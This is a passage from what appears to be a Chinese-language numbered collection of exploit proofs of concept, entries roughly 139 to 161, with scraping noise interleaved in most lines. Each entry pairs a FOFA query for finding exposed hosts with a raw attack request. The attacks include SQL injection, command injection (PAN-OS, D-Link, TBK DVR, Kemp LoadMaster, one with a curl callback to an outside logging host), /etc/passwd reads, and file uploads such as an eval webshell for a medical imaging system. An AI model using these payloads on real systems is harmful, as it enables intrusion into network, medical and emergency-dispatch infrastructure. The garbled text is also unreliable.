6 M: Q2 p% Q7 p& \4 I# PFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
& v b- z5 o- `" _) P' rGET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1* _! ~% u9 X ~: x# q" z
Host: x.x.x.x) B/ h7 n( s! n% P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 M* s& K1 X% N7 k: }$ K. Z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
9 g+ `" w2 s! ~/ ]1 {- _" wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
: Z& P$ D* {% I' uAccept-Encoding: gzip, deflate, br! i8 K& t+ J7 v* }. U1 U: m
Connection: close! O o3 {( X% e8 O) z# T
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
8 z+ L- ~2 P8 q) O6 `" kUpgrade-Insecure-Requests: 1; g8 _8 D% k) }) \3 _. K/ |/ e
: V! s4 g& F ?8 v7 D; H, j7 \: T3 Q, q
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
" k0 Q* h* D, wCVE-2024-2566
" b) r: |$ m* L) s! TFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
2 u0 n; d' d4 u0 @( k6 BGET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva×tamp=1&sign=1 HTTP/1.14 }: e" N7 q! y7 d& T* n4 N
Host: x.x.x.x
' P: R; ^' U) s+ R7 G) F" G0 E8 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.08 L/ H$ V% E) ]/ M9 A: U7 S4 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 U- b: ^! _5 R) D, J1 s! U/ T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 O' V+ O/ W& E
Accept-Encoding: gzip, deflate, br
: l: R9 v5 U; F5 `$ F) k( k- W/ iConnection: close2 z. N( I2 Y0 O# T( T. R1 A
Cookie: authcode=h8g9& U; p* D D( d
Upgrade-Insecure-Requests: 1" ^; `; x, o7 J7 F1 l7 u
- P# }. J4 `7 {& X" Q }
. t& h0 P# o; v8 j3 V+ P- u" J! {" A
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
- f7 m& u" t; R/ Q! QFOFA:body="指挥调度管理平台") W p. {* W5 e$ j- D0 c
POST /app/ext/ajax_users.php HTTP/1.1
% @, q- A4 X4 M4 }Host: your-ip0 J6 L8 Q8 ?' t/ e n4 @
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info0 E- B$ b0 j( _$ }
Content-Type: application/x-www-form-urlencoded
7 z6 E/ m/ Y" Q6 ^0 q2 w+ e' B7 H% W+ @3 U4 h. ?& ^4 v" u
* Q7 l' r+ K+ B3 ?( E
dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -
7 x/ x# Y9 C# j/ {% P8 A0 C3 a; b- n+ O; f3 J W: [7 h
, F& c, K8 K8 Y! k142. CMSV6车辆监控平台系统中存在弱密码
( ?& S% u! L& ^% ^% eCVE-2024-29666+ y h6 V$ ~5 r% I! m/ B. Q" T- |
FOFA:body="/808gps/"
" _# r. C: F4 K& [' madmin/admin
3 X( m# |0 M i. i5 D$ n, x, n143. Netis WF2780 v2.1.40144 远程命令执行
* G& d6 B7 x) L1 L8 ]CVE-2024-258509 e4 l, g; ~% z) c! v1 a, J: O
FOFA:title='AP setup' && header='netis') |$ P& p$ L7 R# d4 K- A
PAYLOAD
8 A& o8 x* u& Q) ?; B8 V! m$ J
o f7 N% k. P: t1 v- ` V144. D-Link nas_sharing.cgi 命令注入
! j: C3 r+ a1 G( eFOFA:app="D_Link-DNS-ShareCenter"# _+ B5 r5 b% j1 l* |7 x2 b
system参数用于传要执行的命令1 {) L$ E! W# Z3 e
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1) E& h3 }$ Z# y
Host: x.x.x.x
: J5 O( m# G& I9 F q" \7 o' RUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
' r3 T: L- t. q6 X5 _+ L0 GConnection: close
: B1 Y9 f! M, ^$ `# m, tAccept: */*& K6 y0 P' t; ?- U- A" N) h; t: C
Accept-Language: en& w6 |* r% A/ r: Y
Accept-Encoding: gzip
/ R8 f6 a6 o9 |& y3 P8 S0 b* C6 F& A
! N1 n! X# G* y, l- f
0 y# [. \: x) G) ]# [145. Palo Alto Networks PAN-OS GlobalProtect 命令注入
4 Z* n/ o4 x: a: e% n3 k8 p6 ZCVE-2024-3400
/ _( ^+ J. Z- w# T- kFOFA:icon_hash="-631559155"
* J7 e: Q% g" HGET /global-protect/login.esp HTTP/1.1
: L( G5 q, T* B5 oHost: 192.168.30.112:10055 r$ B5 r' L; m( e5 q% C, }9 d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.846 T; \: h P7 _1 o1 T' `# ^
Connection: close8 ^5 j( v% C7 B& J, L( K- _
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;$ k# T( \8 |; D1 g5 S. o
Accept-Encoding: gzip
, y% o' W: k+ S. }' y; }# k
. ]9 Y- t" K, U. E' O$ ~3 W- i
1 f/ Y, E: F6 |; ^146. MajorDoMo thumb.php 未授权远程代码执行$ I- p) {4 T* A
CNVD-2024-02175
9 r. o& O5 j% t- ?5 {. zFOFA:app="MajordomoSL"$ H. E, }; y& ^' \! k: s
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1$ K% Z+ ?( ~1 q
Host: x.x.x.x5 ?% S# P3 `. z% ^7 b3 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
) g! X8 P7 m* |7 w2 w+ Z V6 fAccept-Charset: utf-8# y' ^, \/ \3 Q; O, n* w
Accept-Encoding: gzip, deflate" b N" Y* Q* X
Connection: close; C2 U2 @1 f6 h( c5 f
; |7 f8 d4 E$ w7 ^6 d4 q' r1 v% E1 s) [2 x# A, G8 A: k
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
/ S/ |) u. [+ WCVE-2024-32399 x( E4 z4 H Q3 ]7 G
FOFA:body="RaidenMAILD"
F2 g% K2 y* bGET /webeditor/../../../windows/win.ini HTTP/1.1
$ H9 A( W5 {1 D1 ~" FHost: 127.0.0.1:81
]$ Z1 ?1 o$ V% k: H5 y% GCache-Control: max-age=0
8 C3 B4 H- K& o7 P8 d. n9 YConnection: close
8 f4 o4 u" E/ L3 c. Q' }
8 P" s: ]& b a/ z6 K6 c: \ N/ n, s2 n/ |& C
148. CrushFTP 认证绕过模板注入
6 K) P3 S$ @% V: B( w \CVE-2024-4040
) _' X* y v1 `* bFOFA:body="CrushFTP"8 H# w9 k, p* {: D
PAYLOAD, C; T3 w/ N8 e6 ?1 I6 i; x$ W
+ g; I9 c- E3 b: b( `. b149. AJ-Report开源数据大屏存在远程命令执行' d4 E2 Z8 b' }% c5 d% L
FOFA:title="AJ-Report"5 w( F5 j6 p/ u+ x
6 s5 s; D( B2 O* v7 B# }
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1, r* V- E2 y9 M+ B+ y. L a
Host: x.x.x.x
) l! u+ m( ]+ ]4 V" ]( nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
- p7 _, ]% @0 x, f2 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.73 F3 Y- K0 V7 q, W& x* A1 W I
Accept-Encoding: gzip, deflate, br
& n. T7 [. f) C0 y- QAccept-Language: zh-CN,zh;q=0.9; P5 u$ L4 k, e% P# [2 ^# k
Content-Type: application/json;charset=UTF-8/ l, z) m n3 j( v, F/ q
Connection: close; l3 e5 ?1 A) M- |2 z2 o
( E, @/ d! }$ @2 a+ d. m{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
g# J8 k* F+ E' Z' t" C" l
3 F7 f$ W, H( D5 q0 Q5 v; y150. AJ-Report 1.4.0 认证绕过与远程代码执行' }3 [0 e' Y% [& Y5 S! [! M
FOFA:title="AJ-Report"
& _5 C2 ]0 c2 P: GPOST /dataSetParam/verification;swagger-ui/ HTTP/1.1
' H9 R4 K( C7 m8 s1 D$ VHost: x.x.x.x2 @* c+ s% A0 S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.368 ?2 ] H0 Y3 g7 X. ]3 |# ~1 f- V
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# [8 S5 R$ O# {0 G- Z5 FAccept-Encoding: gzip, deflate, br4 D f, e8 h3 W7 `6 a8 w! s0 T
Accept-Language: zh-CN,zh;q=0.9
; s! s& ^. \) C3 g8 t* @Content-Type: application/json;charset=UTF-8# m* G) @% q2 t T! N9 i
Connection: close( _$ j5 f# t2 t
Content-Length: 339
7 }- ^* T& L8 X2 S; h" `% ]7 \! k% U! o- b2 u4 D1 h. o
{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}
: Z7 B, T& i7 y4 R- l
7 o4 z' C3 L; e) P4 Q, p5 r6 q/ V* E9 L! H5 Q x& `
151. AJ-Report 1.4.1 pageList sql注入 P4 L9 t9 u- L5 ]! ?" v% n
FOFA:title="AJ-Report"5 W8 ?1 F" u0 E0 `
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
0 k* y+ }3 P8 ?( o5 R6 Z8 kHost: x.x.x.x
7 ^9 f' R1 O5 T: z+ k5 R% DUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
! T8 E( i3 t/ N- @! ]Connection: close
. m! }8 e0 |( ^0 c7 j3 C+ W6 kAccept-Encoding: gzip I" Y; a% y9 w/ N0 r/ i
) U' S/ h4 n2 G8 P
/ x, B0 D; h9 p
152. Progress Kemp LoadMaster 远程命令执行
: X% x# {/ R! zCVE-2024-1212& U3 Z3 W' @3 \' ^" ?& B* I/ h
LoadMaster <= 7.2.59.2 (GA)$ m+ h+ @( ]0 k1 G3 a
LoadMaster<=7.2.54.8 (LTSF)
& Q* v% w5 A- P/ j* YLoadMaster <= 7.2.48.10 (LTS)
# Y- G- ~( V/ V6 [, rFOFA:body="LoadMaster"" [! U+ V( a$ w( C4 h
JztsczsnOmRvZXNub3RtYXR0ZXI=是';ls;':doesnotmatter的base64编码1 p1 S s5 L1 _$ i) i* r
GET /access/set?param=enableapi&value=1 HTTP/1.15 f3 b0 K# ]. ^+ j' j/ q
Host: x.x.x.x0 h8 M" o- U6 z% y4 G! [: f1 ?5 r+ c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.17 t0 E3 O% e& Y8 I' a- W
Connection: close
; H+ M6 B& q# T$ m& d4 [Accept: */*: j5 o! E5 D2 K5 p: a! E: N
Accept-Language: en
$ D& u% q2 ]7 j' D: qAuthorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
# B% H8 ]+ Q9 |! _ X+ ~; {Accept-Encoding: gzip" y- z. \) m& _; {
# _6 ]4 v E0 Z" y
/ i7 M( N5 u9 r* \8 J
153. gradio任意文件读取1 U! N7 H# C, J& I& [0 [7 I
CVE-2024-1561FOFA:body="__gradio_mode__"5 b% G. @1 K3 \
第一步,请求/config文件获取componets的id, R# @4 c+ c7 G& a% R* }0 [
http://x.x.x.x/config
" d( P5 ^6 X0 P0 f/ L( e, P
' l8 s5 q& c# ~; E7 Z! H3 Z9 u
" I. |8 h" d( ~2 e; ? t# G1 ?第二步,将/etc/passwd的内容写入到一个临时文件
4 R& \$ l- u. K/ f6 JPOST /component_server HTTP/1.15 T$ N% H8 T4 T2 a- n: x2 k
Host: x.x.x.x& E; ?8 S" J( S& D1 i, l3 y
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
# @3 A8 Z/ Y- RConnection: close
* L7 x) U* a6 e3 T3 F' l: ^Content-Length: 115
5 D% ^: ]) M/ x, nContent-Type: application/json
( t1 f" s" Y* v3 y. S e. iAccept-Encoding: gzip3 ]# A/ E" V6 M9 C: y- q0 r
) h' g2 p. ^: T. u6 J2 Y{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}
, b. f- ~4 q4 ~1 B4 s! o4 s& C+ E+ w8 e3 _8 Z& t2 |
# @# }. w& ]1 [. E4 G, a8 V第三步访问
5 G' c0 `. x ` S C" w$ H: `http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd) H4 K0 _, D9 t# x/ n$ N; w$ l! S6 H
3 [! }% H2 `& t$ W( x J7 a6 o& Z3 [0 _ P
154. 天维尔消防救援作战调度平台 SQL注入% ^2 B$ [) s6 } C7 l- n4 [+ j
CVE-2024-3720FOFA:body="天维尔信息科技股份有限公司" && title=="登入" D3 e: |6 J- U5 n+ L+ @) D
POST /twms-service-mfs/mfsNotice/page HTTP/1.1# I; @- j2 s! C6 T, g+ \
Host: x.x.x.x8 ~' `" S8 [) J
Content-Length: 1069 i# G. }2 P8 ^6 b& ~3 @
Cache-Control: max-age=0
+ F b1 d6 z; R0 OUpgrade-Insecure-Requests: 1
$ e' U8 K; }( Z& A1 aOrigin: http://x.x.x.x3 Z* l5 ~4 F; f6 D8 g& m
Content-Type: application/json
G: R% s2 D- e# i! `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36) `# [4 ` o4 O2 [. {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 a/ M( S5 h) H# d3 W, a, r5 O) W+ eReferer: http://x.x.x.x/twms-service-mfs/mfsNotice/page8 a" ?! {2 k% K u& X% }
Accept-Encoding: gzip, deflate
8 |+ h& @0 u jAccept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.73 H) s8 ~. U# J1 l4 R
Connection: close
* }0 c* _7 g" G+ H2 G5 M# R. `& P4 M! S% m- e
{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}9 y4 P& |! I1 y
+ N) o% A) ]7 d4 e
& l" D6 t' q+ \+ P, a& x/ ]! a
155. 六零导航页 file.php 任意文件上传$ ~3 S9 W' B( x$ Z" f" L) M
CVE-2024-34982
, q2 p, i3 [% u9 _6 \6 QFOFA:title=="上网导航 - LyLme Spage": d- P B5 D0 P4 f8 f
POST /include/file.php HTTP/1.1( F- Y% x# \' I9 Q: T
Host: x.x.x.x; |9 K/ ?2 l. h7 @ e+ F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
4 l2 m" Q0 A/ M4 ~4 @2 o5 H2 d( ^Connection: close
, n4 B% [* k! `) y) uContent-Length: 2327 E" J0 W' Z% {( s
Accept: application/json, text/javascript, */*; q=0.01% L. E9 f/ i" w" F1 S( ~) W& Y- @+ A
Accept-Encoding: gzip, deflate, br
9 a" ~7 \! _4 P! q) t- Q( lAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Q, H M; J5 I) D/ h/ o6 s
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
7 g1 d0 {& U/ M: A! e( R/ YX-Requested-With: XMLHttpRequest
! z/ f2 G' S9 `4 }% W
6 K* Z2 W# Z6 N* Y& _1 b" c-----------------------------qttl7vemrsold314zg0f4 f% J* b8 V5 ~) M4 @+ u+ T
Content-Disposition: form-data; name="file"; filename="test.php"( J& k/ U) j! H; O
Content-Type: image/png4 x! O2 N! c8 |) A6 l9 B" e
/ z; M% G- a- u- c' M0 x
<?php phpinfo();unlink(__FILE__);?>
6 w$ A: p0 A, k* c/ j-----------------------------qttl7vemrsold314zg0f--- P" R6 I# l, }! Q8 O; B
" d6 V# v2 r; i$ ?# T& k2 F Z7 m4 B- a+ z% n7 F2 r( X
访问回显文件http://x.x.x.x/files/upload/img_664ab7fd14d2c.php
6 v3 D7 N5 r- [. e6 _# Q, @: [
- i9 K3 v* `% n* F& D, |8 c156. TBK DVR-4104/DVR-4216 操作系统命令注入
% X& q6 g6 Q, j5 sCVE-2024-3721, I% J- _- z, F: |5 f( V4 z
FOFA:"Location: /login.rsp"5 d' I0 q; \" [9 ~- a
·TBK DVR-41040 O6 x& B+ F; |3 i: p/ O$ F
·TBK DVR-4216
2 h/ v- Z8 ~( ]curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"1 P( ]! L( ?$ I8 J& F- o% s
0 E' h& G1 s0 G/ g$ Z0 ~3 ?8 Q
+ q k0 H* `8 o* Y. uPOST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
" a: ]" ~% j8 h. n7 j, n0 tHost: x.x.x.x
% f7 q$ H, D5 E& ZUser-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
" e: L1 t; y! C1 F' xConnection: close
7 ]. ]& | y) D7 LContent-Length: 0' |! _/ V! ~" K& b; I J
Cookie: uid=1
& P( K3 \6 D8 I* D2 r9 H. wAccept-Encoding: gzip
* d: K; g5 W% o/ Y
: Z& c6 c8 Y9 s7 @+ D9 N7 x& @1 Y& E* b) h
157. 美特CRM upload.jsp 任意文件上传. P3 _7 f- h% M$ E
CNVD-2023-06971. \! J# U! F# b' i9 f1 o7 _6 S
FOFA:body="/common/scripts/basic.js"
" F! K2 y0 M+ A6 E0 q" \" n8 nPOST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
L5 z8 V5 b/ L9 v( T2 ^Host: x.x.x.x* f% A- V/ c% e! `' F' ^ j' O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
5 Z. ^+ l8 y0 p6 ~Content-Length: 709. R; Z& _$ g6 G9 `) p! J! u W
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 G3 U2 [1 f9 d: p2 l) ]* S" i5 l
Accept-Encoding: gzip, deflate9 N4 d q; \& y4 H/ W
Accept-Language: zh-CN,zh;q=0.9
/ n; m% V5 u: o& q! [, N8 ]! N0 WCache-Control: max-age=0
x# Y9 Q6 U# [5 [6 _6 @; D: AConnection: close
$ Y s! Q" {+ ?' }7 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
- p3 D6 K3 D! v" r x0 LUpgrade-Insecure-Requests: 19 v& ~( ^! z4 E* K- w; y: |2 H- M
+ q( e- e3 x4 e! G* J
------WebKitFormBoundary1imovELzPsfzp5dN' P# `' I s# H, P
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"8 {; w& ?! P v+ u: T( ~) ^6 k
Content-Type: application/octet-stream
) j ?# ~( O' ^- o. i% n
+ k! M8 c, p) C8 C. Lnyhelxrutzwhrsvsrafb# f. u' L4 u& q/ M+ V+ O8 G
------WebKitFormBoundary1imovELzPsfzp5dN- Y& ^% U' Z+ r# h
Content-Disposition: form-data; name="key"
: V) X' f# q0 j( F" w& Q& L4 J2 Z/ I5 G: o0 ~$ C: K8 B9 { e8 U
null' M) b3 t; O3 {3 e+ t* s( R
------WebKitFormBoundary1imovELzPsfzp5dN
, @* l* @ Y7 f- U7 @Content-Disposition: form-data; name="form"& J) {/ Z/ Y( Z7 d4 L) C" Q
! w) b P& u; Rnull
$ M$ B% u6 l% {3 |4 G' k------WebKitFormBoundary1imovELzPsfzp5dN
8 `9 L4 w( e% d; cContent-Disposition: form-data; name="field"; Q, b2 r1 |) |+ c" ^. ^
1 f9 R! |4 M# ~- c2 I# V$ v
null- z$ i. u& ~' [: x1 L4 S* A4 B: {
------WebKitFormBoundary1imovELzPsfzp5dN5 X: g- H$ E, C+ t' g
Content-Disposition: form-data; name="filetitile"
6 b8 E& Z F6 a) w- z' g) {
) ?% A: H5 ~% R5 `$ {9 W8 Xnull' e9 J. Y/ D3 C% w+ _; ]0 N5 F, G
------WebKitFormBoundary1imovELzPsfzp5dN
2 k' b, q+ `0 S% M8 yContent-Disposition: form-data; name="filefolder"3 l4 k, U7 D" A0 Y
" V' A) D9 \, L6 `+ M# T) dnull6 ?5 H: b! \5 v4 j3 m1 u0 `
------WebKitFormBoundary1imovELzPsfzp5dN--1 [7 H/ W5 }' D7 B, s7 ~
0 p. t% v+ _ Y$ F* R5 |# a* r( h9 t' B, c( }& v! k
http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp
& Y2 ^7 ?% x( K" ^& y
+ F( D% q4 N: ]3 o4 n158. Mura-CMS-processAsyncObject存在SQL注入7 `( C0 V( t, T9 Z
CVE-2024-32640
6 ^% ]5 I. A5 d7 z& DFOFA:"Generator: Masa CMS"
- v- z( y s0 x% A. y$ D, A$ B& K4 ]POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
- y8 c3 N4 ^- [# K* F ZHost: {{Hostname}}0 E* Z0 d; R) I- ^
Content-Type: application/x-www-form-urlencoded
: {. R5 z5 l ?% y {' ]9 Q# h
0 k% P7 p. d( gobject=displayregion&contenthistid=x\'&previewid=1) L2 f$ |- P4 F4 K- q
2 [5 c& O) J% A7 ~
- X+ F+ ^% ~. ~- M( J- \0 m8 M( s159. 英飞达医学影像存档与通信系统 WebJobUpload任意文件上传
2 m' t* P8 q* ?0 G% Y& HFOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")# R7 }% \- T% w
POST /webservices/WebJobUpload.asmx HTTP/1.1
. {0 _8 S5 ^' n; J$ B) |1 z; FHost: x.x.x.x
: H4 r1 c$ L2 `+ eUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36. @1 J$ d2 V1 J* i# [
Content-Length: 1080 }! s2 _$ i2 z% o5 C. f+ _
Accept-Encoding: gzip, deflate
0 L2 L! R5 v& j; F: pConnection: close
; a x8 f) U. cContent-Type: text/xml; charset=utf-8( t& g+ @3 }* B$ C7 g, I) e
Soapaction: "http://rainier/jobUpload"
& u+ H$ S6 Y( A G6 D( o ]3 L1 y/ W/ T# ]% c
<?xml version="1.0" encoding="utf-8"?>& Y* x v' B7 e$ Y2 d7 J
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
2 @" b ]+ ]; I3 ?7 j<soap:Body>
# }+ @1 e4 i% Z0 ?! H! i3 s<jobUpload xmlns="http://rainier">% X n3 r9 K) E1 G, `
<vcode>1</vcode>
% n" c' X6 `( o" d8 c; X* ^. k<subFolder></subFolder>
' S( ~$ v* u2 f' }/ R8 U0 j<fileName>abcrce.asmx</fileName>1 E3 A, W' {4 r% `: O
<bufValue>PCVAIFdlYlNlcnZpY2UgTGFuZ3VhZ2U9IkpTY3JpcHQiIENsYXNzPSJXZWJTZXJ2aWNlMSIgJT4KIAppbXBvcnQgU3lzdGVtO2ltcG9ydCBTeXN0ZW0uV2ViO2ltcG9ydCBTeXN0ZW0uSU87aW1wb3J0IFN5c3RlbS5XZWIuU2VydmljZXM7CmltcG9ydCBTeXN0ZW0uV2ViLlNjcmlwdC5TZXJ2aWNlczsKaW1wb3J0IFN5c3RlbS5XZWI7CmltcG9ydCBTeXN0ZW0uV2ViLlNlcnZpY2VzOwogCnB1YmxpYyBjbGFzcyBXZWJTZXJ2aWNlMSBlleHRlbmRzIFdlYlNlcnZpY2UKewogCldlYk1ldGhvZEF0dHJpYnV0ZSBTY3JpcHRNZXRob2RBdHRyaWJ1dGUgZnVuY3Rpb24gQ21kc2hlbGwoUGFzcyA6IFN0cmluZykgOiBWb2lkCiAgICB7CiAgICAgICAgICAgIHZhciBjIID0gSHR0cENvbnRleHQuQ3VycmVudDsKICAgICAgICAgICAgdmFyIFJlcXVlc3QgPSBjLlJlcXVlc3Q7CiAgICAgICAgICAgIHZhciBSZXNwb25zZSA9IGMuUmVzcG9uc2U7CiAgICAgICAgICAgIGV2YWwoUGFzcyk7CiAgICCB9Cn0=</bufValue>
1 }" C' |/ p d% B- B& C' b</jobUpload>. o, k% L5 L9 T
</soap:Body>! d7 c9 F3 j+ M4 m, b
</soap:Envelope>
* B2 q8 N* C1 W5 m; Z# e0 f( {1 B( F9 [
1 b; G' {5 `% U; p4 d" T7 Z
/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")0 z0 \6 Z w) q0 |( J+ S: Q M- `: u1 Y
) y6 S+ }& J9 i
" N; O R; e1 _. y160. Sonatype Nexus Repository 3目录遍历与文件读取, U: b: @# r3 h4 Q6 @) R3 X. F
CVE-2024-4956
, G: o( w- r# S, j2 `+ u" m$ {3 mFOFA:title="Nexus Repository Manager"' c6 G. _* i) v: v
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
/ e, t0 W, n7 q C2 E3 ]Host: x.x.x.x" A l. q3 B% V) ]8 K4 x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
+ \$ J, ^9 u: T" y# r1 VConnection: close/ R+ }. p% C9 x; g* L
Accept: */*
d+ [8 i; \1 S8 M3 q4 ~Accept-Language: en: c4 }# q, Q( _6 y/ q
Accept-Encoding: gzip
4 t1 _ v5 T* T. V7 J0 p& B4 `# n0 B" [: d
1 c* o4 l( ]) V" D4 B3 z161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% h; u9 ]) ?. K* T4 T0 m. m
FOFA:body="/KT_Css/qd_defaul.css"5 I1 f6 A. U% {- `3 E# O
第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密, t2 N6 w' |* W
POST /Webservice.asmx HTTP/1.1- E' d- G& _- e% F) S6 f
Host: x.x.x.x: }: i; y5 l, }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.368 N* f1 T- M/ J5 D( i1 F' ]
Connection: close+ ]0 c: @) D S; n8 p: U3 u) [
Content-Length: 445
; I" a) N3 X- t! o1 FContent-Type: text/xml0 u7 i1 {, Q* w+ g# i+ q
Accept-Encoding: gzip+ L2 ~2 o6 w+ E" q5 I8 D
! K' Y" _1 J. ], `3 ?1 F
<?xml version="1.0" encoding="utf-8"?>
8 i; f9 r* w- b$ j6 C5 r; o<soap:Envelope xmlns:xsi="
! y' w, b% d* D$ shttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
